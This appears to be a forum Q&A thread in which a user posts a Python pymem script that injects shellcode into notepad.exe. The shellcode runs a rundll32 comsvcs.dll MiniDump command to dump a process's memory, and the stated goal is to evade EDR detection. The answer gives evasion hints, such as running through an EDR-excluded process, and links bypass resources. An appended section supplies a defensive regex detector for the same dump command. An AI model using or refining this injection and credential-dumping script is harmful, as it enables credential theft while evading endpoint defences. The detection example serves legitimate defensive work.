I need to do a process injection using Python. I tried the script below. My objective is to see if the script is working and, if it is, whether it can be used to evade EDR detection.
```python
import pymem
import os
import subprocess
notepad = subprocess.Popen(['notepad.exe'])
pm = pymem.Pymem('notepad.exe')
pm.inject_python_interpreter()
shellcode = """
f = open("C:\TestRule\process_injection.txt", "w+")
f.write("pymem_injection")
f.close()
os.system('rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 988 C:\dump.dmp full')
"""
pm.inject_python_shellcode(shellcode)
notepad.kill()
```
The command within the shellcode, `os.system('rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 988 C:\dump.dmp full')`, gets blocked by our EDR tool when run separately, which indicates that it works. But when used in the script nothing happens except notepad opening. I don't even see any notification of it getting blocked by the EDR. It seems like the code is just ignored.
I can say this because the other code within the shellcode

```python
f = open("C:\TestRule\process_injection.txt", "w+")
f.write("pymem_injection")
f.close()
```

works just fine.
Can anyone please tell me what I am doing wrong and suggest any modification to the script?
asked Feb 6 at 11:50 by Biswa

1 Answer
I can't legally suggest a way for you to bypass EDR, but as for the “rundll32.exe C:\windows\System32\comsvcs.dll” command that you have used here, it can be said that there is no EDR left in the market that will not catch it. Also, opening a file, writing into it and saving the file is not ignored by an EDR either; you need to do this through a process that is already doing this, so that the EDR will ignore a process that is in its exclusions. In short, when trying an EDR bypass, you need to fully understand the working logic first. I can leave you a few links for this:
https://www.vaadata.com/blog/antivirus-and-edr-bypass-techniques/
https://medium.com/@ankitsinha81195_47457/a-deep-dive-into-edr-bypass-strategies-ed25b3929bb1
https://github.com/tkmru/awesome-edr-bypass
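As an added example from the defender's side (it is not part of the question or the answer above), here is the kind of check that makes the answer's point concrete: a scan of process-creation events for the rundll32/comsvcs.dll MiniDump command line the question uses. The events, PIDs and paths are constructed for the example and the field names follow Sysmon conventions; nothing here comes from a real host.

```python
import re

# Constructed sample process-creation events (Sysmon-style field names), not
# taken from any real host; the second one mirrors the command in the question.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Python311\python.exe",
     "CommandLine": "notepad.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 988 C:\dump.dmp full"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL"},
    {"Image": r"C:\Windows\System32\RUNDLL32.EXE",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'RUNDLL32.EXE "C:\Windows\System32\comsvcs.dll",minidump 4242 \\srv\share\o.dmp full'},
]

# comsvcs.dll, optionally followed by a closing quote, then the MiniDump export,
# the target PID and the output path. Case-insensitive, because rundll32 is.
MINIDUMP_RE = re.compile(
    r'comsvcs\.dll"?\s*,\s*minidump\s+(?P<pid>\d+)\s+(?P<path>"[^"]+"|\S+)', re.IGNORECASE)
# Any comsvcs.dll load through rundll32 is rare enough in normal use to be worth a look.
COMSVCS_RE = re.compile(r"comsvcs\.dll", re.IGNORECASE)


def classify(event):
    """Return a detection record for one event, or None if it is not of interest."""
    if not event.get("Image", "").lower().endswith("\\rundll32.exe"):
        return None
    cmd = event.get("CommandLine", "")
    m = MINIDUMP_RE.search(cmd)
    if m:
        # Enrich the hit with what a responder needs first: which process was
        # dumped and where the dump went.
        return {"tag": "comsvcs_minidump", "pid": int(m.group("pid")),
                "dump_path": m.group("path").strip('"'),
                "parent": event.get("ParentImage", "")}
    if COMSVCS_RE.search(cmd):
        return {"tag": "comsvcs_load", "parent": event.get("ParentImage", "")}
    return None


def scan(events):
    """Run classify() over a batch of events and keep only the hits."""
    return [hit for hit in (classify(e) for e in events) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

The second sample shows why matching on the literal command from the question is not enough: quoting, spacing and case all vary, so the rule keys on the DLL name and export rather than the exact string.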